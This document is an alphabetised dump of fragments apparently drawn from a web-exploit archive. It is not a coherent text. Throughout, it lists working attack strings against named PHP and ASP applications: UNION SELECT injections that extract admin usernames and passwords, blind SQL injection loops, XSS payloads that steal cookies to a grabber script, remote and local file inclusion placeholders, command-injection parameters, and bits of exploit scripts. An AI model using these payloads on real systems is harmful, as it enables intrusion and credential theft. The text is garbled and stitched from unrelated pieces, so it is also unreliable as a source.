ghc.ru                       |
ghc.ru                              #    |
ghc.ru",
ghc.ru)
ghc.ru', -font => '{Verdana} 7')->pack();
ghc.ru\n";
ghc.ru\n\r+========================================+\n";
ghc.ru\r\n";
ghc.ru | version 1.31 ]---o
ghdb
ght.c.la
gid,27
GIF
giftcert.php?gcid='><script>alert(document.cookie)<
giftcert.php?gcid='[SQL-inj]
giftcert.php?gcindex='><script>alert(document.cookie)<
giftcert.php?gcindex='[SQL-inj]
gift.php?A=ViewGifts&cid=[SQL]
gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
gigcalendar
gig_desc.php?No=-13+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
gigimages
gigs-2532
gimnazjum.webd.pl
girex.altervista.org
git
gitorious.org
gitweb.cgi?p=phpldapadmin
git.xivo.fr
giulioganci.netsons.org
>* gives you the ability to easily create
gizzar
[gizzar]
gl
gl\">1<
gl_account_inquiry.php
gl_etag>". "<
glf122_update_20130130_01
glfusion131
 - glFusion is an open source content management system developed in PHP providing blog, forum, gallery, downloads.
glinks
glo%62al.php?_tmp[csscolors]=a:1:{s:5:%22right%22;s:27:%22%22%3E%3Cscript%3Ealert(1)%3C
global-content-blocks
global-evolution.info
global-evolution.info%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
global-gen.php
global_group_login.php
global_header.php?installed=23&domain=[Evil_Script]
global.inc.php?l=..
global.php?BASE_DIR=
global.php?db_servertype=[SHeLL]
global.php?do_search=1&high_school=1&state=1&city=2&hsid=1&changed=1&advanced=1&high_school=1&name=%3Cscript%3Edocument.write%28document.c
global.php?nbs=[shell]? 
global.php?path=[evil_scripts]
global.php?pfad=[evilcode]
global.php?_SERVER[HTTP_CLIENT_IP]=??sql
globalsearch
globalsearch-init.php?GLOBALS[sys_plugins_path]=[Shell]
&GLOBALS[gsLanguage]=ezContents
globals-problem
/?GLOBALS[SKIN]=..
GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19+from+users
globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19+from+users
globepersonnel_forum.asp?forumid=[SQL]
globepersonnel_login.asp
globepersonnel.mdb
globepersonnel_reply.asp?id=6&topic=6&recordnum=0
globsy
glossaries
glossary.php?editfile=..
glosslatest
glossword
glossword.info
glossword_path
glpi
glpi-project.org
glsa
glsa-200506-04.xml
gl_trial_balance.php
gmap
gmapfactory
gmap.php?addr="><script>alert(document.cookie);<
gmap.php?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--
gmap.php?id=[sqli]
gmap.php?lat=%3Cscript%3Ealert(0)%3C
gmembers.php?gid=6 AND 1=1
gmembers.php?gid=6 AND 1=2
gmembers.php?gid=6 [Blind SQLi]
gnat-tgp.rar
gnew
gnix.netsons.org
gnokii
gnopaste
[gnopaste_path]
gnu
GnuBoard
gnuboard4
gnuedu.ofset.org
gnugallery.sourceforge.net
gnupg
gnuturk
go
/?go=\"><
'.$go;
go_dl.php?download=1
/?go=download";
golabicms
golabicms.sourceforge.net
golb
gold
gold_features_admin.php  ]
goldv3
goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user
good.php?good_id=
good.php?good_id=1
good.php?good_id= SQL INJECTION 
goofing
goo.gl
google.de
google.fr&pgtype=iframe&amp;amp;L=500&H=500
googlemap
GoogleMap
googlemap.php
google.pl
goollery
gooplecms
GoopleCMS_1.7.rar
/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==
go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
go.php?id=1'
go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785
go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a
go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848
go.php?id=[SQL Injection]
go.php?node='191
go.php?page=nr&nr=[SQL Injection]
gosamba
goster
Goster
gotolink.php?AML_linkid=11
goto.php?target=st_229_35           |
goto.php?target=st_229_35&client_id=docu		     |
\">Go To TheDefaced Forums<
gotourl.php?id=0+union+select+version()--
gotourl.php?id=-30+union+select+concat(version(),user())--
gpb
[gpb_path]
gpb.sourceforge.net
gpeasy
gpg_pubkey.asc.gpg>
GPL
GPL<
gpl-2.0.html
gpl-2.0.html GNU
gpl.html
gpl.html GNU
GPL license<
GPL php5 script that help you to create a complex website. With the webmatic control panel its possible to manage all the contents of a whole website, its possible to create: forums, chat, newsletter, online surveys, users registration page and more.
gPYdq.png
grabber.js><
grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL] 
grab.php?c="+document.cookie+"&ref="+document.URL);window.close();<
grab.php?cmd=&apos;+document.cookie;&quot;&gt;&lt;
Grab the server type from the http header.
gradebook
gradman
GRAFFITI_CMS_INSTALL_DIR
grafik_cms
grains.add-edit.php
grains.list.php
grapefile
grapeupload.php
graph
graph-component.html
graphics
Graphics
Graphics_Interchange_Format
graph_image.php?local_graph_id=[valid_value]&gr
graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a
graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C
graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C
graph.php?module=
graphs
graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true
graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html
gratis-download
gratis-toplisten-script
gravapwnd.php?zboob=john@wargan.com
gravity
gravity-gtd
grboard
greenpants
greenwood
greetings
 greets all https:
greezla
gregory.kokanosky.free.fr
grep.php%3E%3C
greysoft
grifter.org
grounds
group
/?group=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
Group.class.php?gfcommon=[Shell]
group_concat(admin_name,char(58),admin_password)v3n0m
group_concat(username,0x3a,password),2
Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
group_concat(username,char(58),password)v3n0m
groupcp.php?g=881&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C
groupeclan.free.fr
group_edit_handler.php?gfplugins=[Shell]
group_edit.php?gfplugins=[Shell]
group-ib.ru
group-ib.ru)
/?group_id=1072
/?group_id=157964&atid=8059299
/?group_id=175&release_id=1289
/?group_id=30&release_id=145
/?group_id=413&release_id=1978
/?group_id=434
/?group_id=90418
/?group_id=988&release_id=3622
/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
group_index.php?id=-1067+Union+select+0,0,0,0,0,0,0,0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tbl_admin--
groupjive
GroupJoinRequest.class.php?gfcommon=[Shell]
groupoffice
group-office
groupoffice-com-3.5.9
group-office-sqli.html
group.php
group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
group.php?gfcommon=[Shell]
group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'
group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12--
group.php on remote server
group_posts.php?urlkey=1&gid=1&tid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a3a,uid,username,pwd),6,7+from+signup+limit+0,20
groups
GroupSearchEngine.class.php?gfwww=[Shell]
groups&idx=get&id_parent="><script>alert(8);<
groups.php
groups.php?cat='1
groups.php?cat=1'<ScRiPt >prompt(987925)<
groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
groups.php?edit=1" method="post">
groups.php?edit=[ARTICLE ID]
groups.php?new=entry
groups.php?type=&amp;&cat=4+and+substring(@@version,1,1)=4
groups.php?type=&amp;&cat=4+and+substring(@@version,1,1)=4 
groups.php?visible=[CATEGORY ID]&action=0
groups.php?visible=[CATEGORY ID]&action=1
groups_profile.php?gid=311"><script>alert()<
groups.queries.php?_SESSION[user_language]=[etc
groupware-tools
gsb
gscripts.net
gsegyview.sourceforge.net
g,String.fromCharCode(47)),
gst.void.ru) heya Ch0ke7 and off couse "re ine" ;)
guanxicrm
guarani_server
[gubrak]
guest
guestbook
Guestbook
guestbook.0.4.1
guestbookaction.php?PathToRoot= [LFI]
guestbook-admin.php
guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>
guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>
guestbookdat 
guestbook.inc.php?path[cb]=[cmd_url]
guestbook.inc.php?rel=[evil_scripts]
guestbook_ips2block
guestbook_new.php?headline=" onmouseover=alert(
guestbook_path
guestbook.php
guestbook.php?action=addnew&diwan_id=1 .
guestbook.php?admin="><script>alert(document.cookie)<
guestbook.php?dbs_base_path=[SHELL]
guestbook.php?diwan_id=1&action=view&offset=0
guestbook.php?diwan_id=8&action=view&offset=1'
guestbook.php?diwan_id=8&action=view&offset=1[SQL HERE]
guestbook.php?diwan_id=8&action=view&offset=5860'
guestbook.php?id=4 
Guestbook.php   <== Insert Yor Script
guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 
guestbook.php?lang=[LFI]
guestbook.php?menuid=<script>alert('HELLO');<
guestbook.php?menuid=[SQL] 
guestbook.php?p=[SQL-INJECTION]
guestbook.php?tryag=id
guest_book_plus.html
guest-posting-plugin
guestside
guide
guide.php?id=-1+UNION+SELECT+1,2,concat_ws(char(58),id,name,uniqname,email),4,5,6,7,8,9%20from%20selector
guides
gulftech.org
gunaysoft
gunaysoft.php?icerikyolu=[shell]                 		 
gunaysoft.php?sayfaid=[shell]
gunaysoft.php?uzanti=[shell]
guppy
gvideos.php?gid=1 AND 1=1
gvideos.php?gid=1 AND 1=2
gvideos.php?gid=1 [Blind]
gw_admin.php?a=edit-own&t=users
gw_admin.php?a="><script>alert(1);<
gwebmail
" + gwebmail_server + "
gw_export
gw_install
gw_instal l
gwm.dev-area.org
gw_temp
gyrbo.madoka.be
h0rd.net
[h0sT]
h0wl.pl
h1>
h1><
h1> 
h1>','<
h1%3E 
h1987786.stratoserver.net:8096
h1>&action=search&start=0
h1><br>";<
h1><div style=display:none>
/?h=-1+union+select+1
h2><
h2>','<
h2o-cms
h3><
h3>','<
h4ckb0x.org
h4ck-y0u.org
h4cky0u.org
h4x0r.org
h5>
h8sbwikey
habari
habariproject.org
haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201 
haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201 
hack
h.ackack.net
hack.asp?%22%2Bdocument.cookie)<
hackb0x
hackberry.ath.cx
hack.c
hack-collabtive048
hacked.js><
hacker
[hacker]
hacker1.own
hacker1.own 
[hacker_box]
hacker-cisadane.org
hacker_egy
ha.ckers.org
hack-formmail_192
hacking
hacking.ge
hack-mantis111
hack-moodle193
hackpedia.info                     |
hackpo6.jpg"); 
HackSociety.net !
hack-sugarcrm_520e
hacktalk.net
hackteach.org
hackteach.org                                                                                       ++
Hackteach.org                                                  #
Hackteach.org                               #"
HaCkTeCh.Org
hack-vtigercrm_504
hack-zabbix_162
hailboards.org
halite-0.1rc1.rar                                          |
hamid.ir
handle_item.php?item=<script>alert('Hi');<
handle.php?_REQUEST[read]=[EV!L]
handler_image.php
handlers
handwrite
happy
-happy-hyperbole-v2-0-6-is-in-full-bloom
harald-kampen.de
harpia
) has
) has added rules to the commercial
) has added rules to the commercial rules feed
has_entries.inc
hashcrack.php',
".$hash, HttpRequest::METH_GET);
hastymail
hastymail.svn.sourceforge.net
hastymail?view=revision&revision=2078
haut.php?modulename=..
hava_link.php?linkId=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
havalite
hava_login.php
hava_post.php?postId=1
hava_post.php?postId=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
ha.xxor.se
ha.xxor.se                                          [][] []  [] []    [][]  [][]  []   [] 
hazelpress.org
hbcms
hbportal
hbYy35
hcl
hcmitglieder
hd-webplayer
head>
head><
head> 
head_auth.php?CFG[PREPEND_FILE]=[SHELL]    
head_bg_new.gif%20onload=javascript:alert(document.cookie)>
head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001
head>  <body>  <form method="post" action="invite.php?action=inviteusers">  <div class="container2">  <div style="background-color:#3E92BD;border-bottom:1px solid #11648F;">   <div class="invitetitle">{$otavchat_language[16]}<
head>    <body><form name="upload" action="upload.php" method="post" enctype="multipart
head><body><script>alert(1);<
head><body><script>alert(document.cookie)<\script>
head><body>test
header1.php?id="><script>alert(document.cookie);<
header_album.php?global_lang=[LFI]%00
header_blog.php?global_lang=[LFI]%00
header> <br 
header_group.php?global_lang=[LFI]%00
header>('HTTP
header.inc.php?ficStyle=[evilcode]
header.inc.php?handler=1234&settings[header]=..
header.inc.php?menu=[SHELL]    
header.inc.php?template_path=[LFI]
header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
header>('Location: '.$url);
header.php
header.php?
header.php?BANNER_Url="><script>alert(document.cookie)<
header.php?bgcolor=<
header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=..
header.php?count=><script>alert(document.cookie)<
header.php?c_temp_path=[LFI]
header.php?CURUSER[username]=<script>alert(123);<
header.php?DOC_ROOT=[Shell]
header.php?GLOBALS[message]=<script>alert("css strikes!");<
header.php?header.php?lang=[LFI]
header.php HTTP
header.php?IMAGES_Url="><script>alert(document.cookie)<
header.php?lang=..
header.php?language=
header.php?L_February="}<
header.php?L_Help="><script>alert(document.cookie)<
header.php?L_Info="><script>alert(document.cookie)<
header.php?L_January="}<
header.php?L_Monday="}<
header.php?L_Sunday="}<
header.php?L_Visitors=><script>alert(document.cookie)<
header.php?mod_root=[Evil_Script]
header.php?mod=' union select
header.php?osticket_title=%3C
header.php?PathNews=[shell]
header.php?path=[[Sh3LL Script]]
header.php?PMF_LANG[metaLanguage]="><script>alert(document.cookie)<
header.php?row[titledesc]=<script>alert(123)<
header.php?SITE_Logo="><script>alert(document.cookie)<
header.php?SITENAME="><script>alert(123);<
header.php?sitename="><script>alert(document.cookie)<
header.php?sitetitle=<
header.php?skin=..
header.php?skin=[Local File]%00
header.php?TABLE_Width=><script>alert(document.cookie)<
header.php?theme_directory=[Shell]%00
header.php?theme_file=[EV!L] 
header.php?theme_root=[Evil_Script]
header.php?title=<
header.php?TMPL[path]=[shell]
header.php?version=<
header.php?version[author]=--><script>alert('lol')<
header.php?version[email]=--><script>alert('lol')<
header.php?version[fullname]=<script>alert('lol')<
header.php?version[no]=<
header.php?voir=hop&skinfile=..
header_setup.php?component=[EV!L]
header_setup.php?path[docroot]=[EV!L]
headline
headlineBox.php?rel=[cmd_url]
headlineBox.php?rel=[evil_scripts]
headlines.php?header_prog=[Evil_Script]
headlines.php?main_dir=[SHELL]
headlines.php?website=[SHELL]
headline_temp.php?nst_cmd=ls -la";
<head><meta http-equiv="Refresh" content="0; URL=modules\
head.php?cmspage=<
healthmonitor
healthstats
heanet.dl.sourceforge.net
heatmap
hedgehog-cms
" height=0 width=0><
hellknights.void.ru
hello.php?cmd='.$cmd) or print $errr00 and the_end(); print $req5, "\n"; } sub usageis { print "| Usage: -host localhost -path 
helloword
helloworld
hello-world
helloworld-init.php?gfplugins=[Shell]
','helo=x')
help
helpadmin;ext=help
help_admin.php?gfplugins=[Shell]
help_bug.php?gfplugins=[Shell]
help_create.php?_SERVER[DOCUMENT_ROOT]=
help_demo
help_demo                                                               ¦       ¦                                       ¦
helpdesk
helpdesk2000.mdb
helpdesk.php?__mode=[SQL]
helpdesk.php?__mode=view&__id=[SQL] 
helpdesk.php?op=ticket" method="post">
help-desk-software
help-details.php?hpId=-38'
help-details.php?hpId=-38+union+select+all+1,version(),3,4,5,6,7--
helpdocs
help_edit_entry.php?gfplugins=[Shell]
helper
helpers
helpers.php?absolute_path=<deviL>
helpfiles
help_import.php?gfplugins=[Shell]
help.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
help_index.php?gfplugins=[Shell]
help_layers.php?gfplugins=[Shell]
helplink
help_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
help?module=..
help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C
help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C
help.php?CONFIG[main_path]=[evil_scripts]
help.php?DOCUMENT_ROOT=
help.php?file=..
help.php?lang=[local file]%00
help.php?language=..
help.php?language=[File]
help.php?language=[LFI]%00
help.php?language=[Local File]%00
help.php?module=..
help.php?page=..
help.php?section='><script>alert(document.cookie)<
help.php?section='[SQL-inj]
help.php?_SERVER[DOCUMENT_ROOT]=
help.php?sid=<script>alert
help_pref.php?gfplugins=[Shell]
Help?system_id=pem&book_type=login&help_id=change_password&locale=
help_view.php?_SERVER[DOCUMENT_ROOT]=
henryhoggard.co.uk
hentan.eu
	<= here
 <= here is the path of attacker file or shell backdoor will be placed.
hermawan.net
herve.labas.free.fr
hesk
hex(concat(username,0x20,user_password))
hexjector
Hexjector
Hexjector(Win32)
HFile.php
hgb
hg.moinmo.in
hGq26645.jpg
hh9ZB4
hha.zapto.org
hha.zapto.org                           
hi9223test.php
hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
highfields.info
highlight.php?file=ciamosinstallationpath\mainfile.php&line=151#151 
highlight.php?file=[runcmsinstallationpath]\mainfile.php&line=151#151
high_score.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins
high_score.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7
high_score_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins
high_score_web.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7
highslide
hihi.org
hilfe-forum.pytalhost.de
hilfsmittel.php?action=read&katid=5'
hioxBannerRotate.php?hm=[Evil]
hioxRandomAd.php?hm=Evil_Code
hioxstats.php?hm=Evil_Code
hioxupdate.php?hm=Evil_Code
history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,
history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-
history.php?mosConfig_absolute_path=[evilcode]
hitcounter.php?
hitruns.php" method="post">
hits.php";
hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C
hits.php?sortby=1'";
hittorf
hitweb
hitweb-4.2_php.tgz
hive
hivemail
~hkicken
#hl=bs&q=%22Powered+by+Weatimages%22&start=20&sa=N&fp=73afe0b6734a45d2  (google says 200 000,i dont trust them)
hlogin.html" method="post" name="main" >
hlphpsql
hlstats.php )<br>
hlstats.php?mode=search&q=%3CH1%3EHacked by Sora%3C%2FH1%3E&st=player&game=l4d
hlstatsx
#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles
&hl=tr&start=0&sa=N
&hl=tr&start=90&sa=N
hluzLf					#
HM_1_41F_103.rar
HMAC.php?_ENV[asicms][path]=
hmailserver
HMailServer
hmailserver.ini%00
hMailServer.INI%00
','',$hmatch[0]);
HM-Community
)]hmm[
hm-my-country-flags
hms
hms-testimonials
hndefs.inc.php3
hnmain.inc.php3?config[incdir]=[attacker.com]
".$ho."
holding_queue.php?lock=%27SQL_CODE_HERE
holding_queue.php" method="post">
holding_queue.php?unlock=%27SQL_CODE_HERE
holiday
holocms
home
[home]
Home
Home 
home'),4,5,6,7,8,9,10,11,12,13%20FROM%20links
homeadmin
home.asp
homebusiness
Home_Classifieds
HomeComputer.jpg+onload=alert(213771818860)>
home.gif%00%22%3E<script>alert(document.cookie);<
home.htm
home.html
home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
home.html?menu=[$qL] 
homenew
home?op=cat&cid=29"><script>alert(123456)<
home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
home?op=cat&cid=[sql]
homepage
home_page
HomePage.class.php?base_path=[evil_scripts]
homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
homepage.php there is no check for file extention	   #
[HOME_PATH]
homepg
home.php
home.php?action=results&poll_id=-9999
home.php?cat=59' HAVING 1=1
home.php?cat=59' {SQL Injection}
home.php?cat='><script>alert(document.cookie)<
home.php?cat='[SQL-inj]
home.php?do=del;id=%31%27%3E%0A[Javascript]%31%27%3E%0A = 1'> 
home.php?genres_parent=-1%20union
home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C
home.php?genres_parent="><script>alert(document.cookie);<
home.php?home=[SHELL]
home.php?id=-2
home.php?id=37
home.php?page=[evilscript]
home.php?page_id=[BLIND SQLi]            0
home.php?printable='><script>alert(document.cookie)<
home.php?printable='[SQL-inj]
home.php?target=
home.php?template= [inj3ct0r sh3ll]
home.vlab.info
Home_Wiky
hops.add-edit.php
hops.list.php
horde
horde-3.3.5
/?Horde=<sessid>
host
<host>
' + host,
' +host+ '
'.$host,[
'.$host;
'.$host; }
'.$host;}
" . $host;}
".$host;
".$host."
".$host);
"+host+"
[host
[host]
[host][
{$host}
$host
${host}
$host";
$host\">";
host 
host">
HOST
[HOST]
{HOST}
$HOST
){ $host = $1; } 
',$host) and strlen($user) < 5)
".$host.$argv[2];
".$host."categories_portal.php?cat_id=".$cat_id." and (SUBSTRING((SELECT password FROM users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
$host (check for shell yourself in $path
$host (check shell yourself)\n\n");
" . $host . $dir . "
".$host.$dir."
$host".$dir."admin.php?sid=$var\n";
hostdirectory
".$host.$dir."index.php",'USER_AGENT'=>'Mozilla
".$host.$dir."\n";
{$host}{$dir}shell.php?cmd={$cmd}"));
", $host, $dummy)) {
[host] [filename]\r\n";
$host$folder"; 
$host$folder" . $otherurl; }
$host$folder" . 'search.php' }
$host$folder" . 'search.php';
$host$folder" . 'usergroups.php' }
$host$folder" . 'usergroups.php';
$host" : $host;
[host] [id]\n";
'.$host if ($host !~ 
'.$host if( $host !~ 
".$host if ($host !~ 
">[hostile_code]<
hostindex
[hostindex_path]
".$host."index.php?article=".$article." and (SUBSTRING((SELECT password FROM AMCMS_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
".$host."index.php?m=login\r\n";
".$host."index.php?m=profile\r\n";
hosting
hostinginterfaces
hosting.php?do=order&planid=1&step=6 ]
Hosting-php-dynamic
$host is not vulnerable or error\n");
".$host."itechd.php?productid=".$productid." and (SUBSTRING((SELECT password FROM admin LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
'.$host_mybb.'
[host]\n";
hostname
<hostname>
[hostname]
$hostname:9999
$hostname$dir
{$hostname}{$path}
${hostname}${path}
hostname:(port)
[host] [name_shell.php]\n".
host need\n", 0);
$host!\n\n";
$host\n\n";
$host\n\n");
hostnomi.net
".$host."\n";sleep (2);
<host><path>
'.$host.$path,
'.$host.$path.'',
'.$host.$path);
" . $host . $path . "
".$host.$path;
".$host.$path."
".$host.$path);
${host}${path}
${host}${path}";
$host$path
".$hOsT.$pAtH."action.php?action=write&lang=en&sort=1&sortdir=1\r\n";
".$host.$path."add.php HTTP
".$host.$path."add.php?l=default\r\n";
'.$host.$path.'admin
".$host.$path."admin
".$host.$path."admincp
${host}${path}administration
".$host.$path."admin.php\r\n";
".$host.$path."articles
'.$host.$path.'auth
".$host.$path."blog.php\r\n";
'.$host.$path.'cache
".$host.$path."calendar.php?action=dayview&year=2007&month=3&day=1111111'%20OR%20SUBSTRING((SELECT%20password%20FROM%20mybb_users%20WHERE%20uid=".$uid."),".$i.",1)=CHAR(".$h.")
".$host.$path."category.php?manufacturer_id=".$mfr."&category_id=".$cat."%20AND%20SUBSTRING((SELECT%20admin_password%20FROM%20".$table."%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")";
".$host.$path."category.php\r\n";
".$host.$path."cfgphpquiz
".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid;
".$host.$path."conf
'.$host.$path.'data
".$host.$path."data
$host$path$def_shell";
$host$path$def_shell\n\n";
".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."
".$host.$path.$dir;
" . $host.$path . "edit.php?em=file&filename=" . $path . "index.php\r\n";
".$host.$path."edit_profile.php\r\n";
".$host.$path."example2.php?subaction=showcomments&id=".urlencode($articleid)."&archive=&start_from=&ucat=1&\r\n";
".$host.$path.$file." HTTP
".$host.$path."forum
'.$host.$path.'forumdata
".$host.$path."forum.php\r\n";
".$host.$path."gallery.php?action=window&galleryID=".$gid."&picID=".$pid."%20AND%20MID((SELECT%20password%20FROM%20".$prefix."user%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")");
".$host.$path."go.php?id=".$id."%20union%20select%20concat(username,0x2f,password)%20from%20admin";
"."$host"."$path";&hello;
".$host.$Path."'>".$host.$Path."<
".$host.$path." HTTP
" .$host.$path. "images
$host".$path."img_quiz
".$host.$path."include
'.$host.$path.'includes
'.$host.$path.'index.php
".$host.$path."index.php";
".$host.$path."index.php");
".$host.$path."index.php?action=post;topic=1.0;num_replies=0\r\n";
{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
".$host.$path."index.php?cat_id=".$cat."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")";
" .$host.$path. "index.php?cmd=[COMMAND]\r\n";
".$host.$path."index.php?cmd=".urlencode($command)."&LANGCODE=
".$host.$path."index.php?group=".$cat."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20customer%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")&page=categories";
".$host.$path."index.php HTTP
".$host.$path."index.php?lang=en\r\n";
".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")
".$host.$path."index.php?method=remind_password_form&list=maillistuser&fromlist=maillist&frommethod=showhtmllist\r\n";
".$host.$path."index.php?module=Jokes&do=ajaxcancel HTTP
".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_frontpage&Itemid=1");
".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";
".$host.$path."index.php?option=com_jb2&view=category&CategoryID=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
